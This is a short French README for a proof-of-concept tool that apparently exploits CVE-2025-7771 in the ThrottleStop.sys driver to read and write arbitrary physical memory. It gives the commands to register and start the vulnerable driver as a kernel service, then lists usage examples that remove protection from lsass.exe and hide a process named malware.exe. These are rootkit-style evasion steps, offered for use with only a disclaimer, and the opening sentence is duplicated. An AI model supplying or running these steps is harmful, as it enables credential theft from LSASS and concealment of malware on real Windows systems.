
Un simple PoC démontrant la vulnérabilité du pilote ThrottleStop.sys, montrant des capacités de lecture et d'écriture arbitraires dans la mémoire physique, ainsi que la traduction d'adresses virtuelles en physiques à l'aide de Superfetch.
Un PoC simple démontrant la vulnérabilité dans le pilote ThrottleStop.sys, montrant des capacités de lecture et d'écriture arbitraires en mémoire physique, ainsi que la traduction d'adresses virtuelles en adresses physiques via Superfetch.
Lancez cmd.exe avec les privilèges Administrateur et enregistrez un service de pilote noyau avec le type "kernel" et binPath pointant vers l'emplacement du pilote vulnérable.
> sc create ThrottleStop binPath= <chemin> type= kernel`
> sc start ThrottleStop
Commandes :
--protect : Protéger un processus.
--unprotect : Déprotéger un processus protégé.
--hide : Cacher un processus.
--unhide : Décacher un processus.
--help : Afficher l'aide
Exemples :
CVE-2025-7771.exe --protect notepad.exe ou CVE-2025-7771.exe --protect 12345
CVE-2025-7771.exe --unprotect lsass.exe ou CVE-2025-7771.exe --unprotect 12345
CVE-2025-7771.exe --hide malware.exe ou CVE-2025-7771.exe --hide 12345
Pour décacher un processus caché, vous pouvez utiliser la commande --unhide en spécifiant l'adresse eprocess du processus caché avec '--eprocess' :
CVE-2025-7771.exe --unhide --eprocess 0xffffc207da1d9240
Vous êtes responsable d'obtenir les autorisations appropriées avant d'utiliser cet outil. L'auteur décline toute responsabilité en cas d'utilisation abusive.
Ce projet est en cours, les contributions et suggestions sont les bienvenues ! Si vous avez des idées, des améliorations, ou souhaitez collaborer, n'hésitez pas à me contacter à : [email protected]